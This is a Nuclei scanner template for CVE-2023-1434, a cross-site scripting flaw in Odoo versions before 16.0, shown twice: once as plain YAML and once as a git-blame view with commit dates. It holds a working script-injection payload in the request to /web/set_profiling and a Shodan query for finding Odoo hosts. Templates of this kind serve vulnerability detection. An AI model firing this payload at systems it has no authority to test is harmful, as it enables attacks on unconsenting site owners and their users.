nuclei-templates/http/cves/2023/CVE-2023-1434.yaml

id: CVE-2023-1434

info:
  name: Odoo - Cross-Site Scripting
  author: DhiyaneshDK
  severity: medium
  description: |
    Odoo is a business suite that has features for many business-critical areas, such as e-commerce, billing, or CRM. Versions before the 16.0 release are vulnerable to CVE-2023-1434 and is caused by an incorrect content type being set on an API endpoint.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix this vulnerability.
  reference:
    - https://www.sonarsource.com/blog/odoo-get-your-content-type-right-or-else
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1434
  classification:
    cve-id: CVE-2023-1434
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"Odoo"
  tags: cve,cve2023,odoo,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/web/set_profiling?profile=0&collectors=<script>alert(document.domain)</script>"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<script>alert(document.domain)</script>'
          - '"params":'
          - 'session'
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200

# digest: 490a0046304402206aca9c974becbffd46255feaa2ba0db4491e5219a35c0cbc3db40fd20486142d02202661ddbc904295781fbbdea1b323355da660ee9b7a33d68fe758aced5040f602:922c64590222798bb761d5b6d8e72950
Create CVE-2023-1434.yaml 2023-05-17 05:25:25 +00:00			`id: CVE-2023-1434`

			`info:`
			`name: Odoo - Cross-Site Scripting`
			`author: DhiyaneshDK`
			`severity: medium`
Update CVE-2023-1434.yaml 2023-06-12 10:31:17 +00:00			`description: \|`
			`Odoo is a business suite that has features for many business-critical areas, such as e-commerce, billing, or CRM. Versions before the 16.0 release are vulnerable to CVE-2023-1434 and is caused by an incorrect content type being set on an API endpoint.`
updated remediation in 2023 CVEs 2023-09-06 11:43:37 +00:00			`remediation: \|`
			`Apply the latest security patches or updates provided by the vendor to fix this vulnerability.`
Create CVE-2023-1434.yaml 2023-05-17 05:25:25 +00:00			`reference:`
			`- https://www.sonarsource.com/blog/odoo-get-your-content-type-right-or-else`
Updated CVE-2023-1434 2023-05-30 12:41:56 +00:00			`- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1434`
			`classification:`
			`cve-id: CVE-2023-1434`
			`cwe-id: CWE-79`
Create CVE-2023-1434.yaml 2023-05-17 05:25:25 +00:00			`metadata:`
boolean format update 2023-06-04 08:13:42 +00:00			`verified: true`
updated remediation in 2023 CVEs 2023-09-06 11:43:37 +00:00			`max-request: 1`
Create CVE-2023-1434.yaml 2023-05-17 05:25:25 +00:00			`shodan-query: title:"Odoo"`
			`tags: cve,cve2023,odoo,xss`

			`http:`
			`- method: GET`
			`path:`
Updated CVE-2023-1434 2023-05-30 12:41:56 +00:00			`- "{{BaseURL}}/web/set_profiling?profile=0&collectors=<script>alert(document.domain)</script>"`
Create CVE-2023-1434.yaml 2023-05-17 05:25:25 +00:00
			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
			`- '<script>alert(document.domain)</script>'`
updated weak matcher 2023-05-18 13:52:06 +00:00			`- '"params":'`
			`- 'session'`
Create CVE-2023-1434.yaml 2023-05-17 05:25:25 +00:00			`condition: and`

			`- type: word`
			`part: header`
			`words:`
			`- "text/html"`

			`- type: status`
			`status:`
			`- 200`
TemplateMan Update [Fri Oct 20 11:41:12 UTC 2023] :robot: 2023-10-20 11:41:13 +00:00
			`# digest: 490a0046304402206aca9c974becbffd46255feaa2ba0db4491e5219a35c0cbc3db40fd20486142d02202661ddbc904295781fbbdea1b323355da660ee9b7a33d68fe758aced5040f602:922c64590222798bb761d5b6d8e72950`